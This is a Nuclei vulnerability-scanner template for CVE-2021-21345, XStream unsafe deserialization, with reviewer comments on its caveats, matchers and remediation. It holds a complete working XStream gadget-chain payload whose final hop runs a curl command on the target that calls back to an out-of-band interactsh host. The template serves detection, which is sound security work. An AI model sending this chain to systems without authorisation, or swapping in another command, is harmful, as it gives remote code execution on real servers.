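# Nuclei template: blind, out-of-band (OAST) check for XStream unsafe
# deserialization, CVE-2021-21345. It POSTs an XStream gadget chain whose last
# hop runs a shell command that calls back to the interactsh server. A verified
# callback is the ONLY success signal: a vulnerable target that cannot reach the
# OAST host, or that lacks `curl` (see the request notes below), is reported as
# not vulnerable, so treat a clean result as "not confirmed", not "safe".
id: CVE-2021-21345

info:
  name: XStream < 1.4.16 - Remote Code Execution
  author: pwnhxl
  severity: critical
  description: |
    In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker who has sufficient rights to execute commands of the host only by manipulating the processed input stream.
  # Remediation: upgrade to XStream 1.4.16 or later (the changes.html reference
  # below is the release note); the advisory links cover mitigation for older
  # releases.
  reference:
    - https://x-stream.github.io/CVE-2021-21345.html
    - http://x-stream.github.io/changes.html#1.4.16
    - https://github.com/x-stream/xstream/security/advisories/GHSA-hwpc-8xqv-jvj4
  classification:
    # PR:L mirrors the description: the attacker needs enough rights to reach
    # an endpoint that hands attacker-controlled XML to XStream.
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2021-21345
    # CWE-78 names the impact (OS command execution); the root cause is
    # deserialization of untrusted input, as the `deserialization` tag says.
    cwe-id: CWE-78
  tags: cve,cve2021,xstream,deserialization,rce,oast

# One raw request. Caveats a tester should know before trusting a negative:
#   - The payload is sent to `/` with Content-Type application/xml. An
#     XStream-backed endpoint on another path, or one that expects a different
#     content type or a wrapper document, is not exercised.
#   - The chain is built from JDK-internal classes (sun.awt.*,
#     com.sun.xml.internal.*, com.sun.corba.se.*). NOTE(review): presumably
#     these resolve only on older (JDK 8-era) runtimes; a vulnerable XStream on
#     a newer JDK may not fire this particular chain - confirm before relying
#     on this template for coverage.
#   - The command is `curl`, so the target host needs curl on PATH plus egress
#     to the interactsh server; otherwise the check is a false negative.
# Chain shape, top to bottom: a PriorityQueue in custom-serialization form with
# an IndexOrderComparator whose indexMap is a JAX-WS ResponseContext, leading
# through JAXB bridge/bean objects to a GetterSetterReflection accessor that
# names ServerTableEntry.verify, and a ServerTableEntry whose `activationCmd`
# holds the callback command. How each hop triggers the next is described in
# the referenced advisory; nothing here is changed from the published chain.
requests:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <java.util.PriorityQueue serialization='custom'>
          <unserializable-parents/>
          <java.util.PriorityQueue>
            <default>
              <size>2</size>
              <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
                <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
                  <packet>
                    <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
                      <dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>
                        <bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>
                          <bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>
                            <bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>
                              <jaxbType>com.sun.corba.se.impl.activation.ServerTableEntry</jaxbType>
                              <uriProperties/>
                              <attributeProperties/>
                              <inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>
                                <getter>
                                  <class>com.sun.corba.se.impl.activation.ServerTableEntry</class>
                                  <name>verify</name>
                                  <parameter-types/>
                                </getter>
                              </inheritedAttWildcard>
                            </bi>
                            <tagName/>
                            <context>
                              <marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>
                                <outer-class reference='../..'/>
                              </marshallerPool>
                              <nameList>
                                <nsUriCannotBeDefaulted>
                                  <boolean>true</boolean>
                                </nsUriCannotBeDefaulted>
                                <namespaceURIs>
                                  <string>1</string>
                                </namespaceURIs>
                                <localNames>
                                  <string>UTF-8</string>
                                </localNames>
                              </nameList>
                            </context>
                          </bridge>
                        </bridge>
                        <jaxbObject class='com.sun.corba.se.impl.activation.ServerTableEntry'>
                          <activationCmd>curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}'</activationCmd>
                        </jaxbObject>
                      </dataSource>
                    </message>
                    <satellites/>
                    <invocationProperties/>
                  </packet>
                </indexMap>
              </comparator>
            </default>
            <int>3</int>
            <string>javax.xml.ws.binding.attachments.inbound</string>
            <string>javax.xml.ws.binding.attachments.inbound</string>
          </java.util.PriorityQueue>
        </java.util.PriorityQueue>

    # Both matchers must hit: an HTTP interaction must reach the OAST server
    # AND it must carry the User-Agent token sent in this request, so unrelated
    # interactsh traffic is not reported as a finding.
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      # NOTE(review): this relies on nuclei rendering {{rand_base(6)}} to the
      # same value here and in the request body. If the two evaluations can
      # differ, this matcher never matches and the template always reports
      # clean - confirm, or hoist the token into a `variables:` entry.
      - type: word
        part: interactsh_request
        words:
          - "User-Agent: {{rand_base(6)}}"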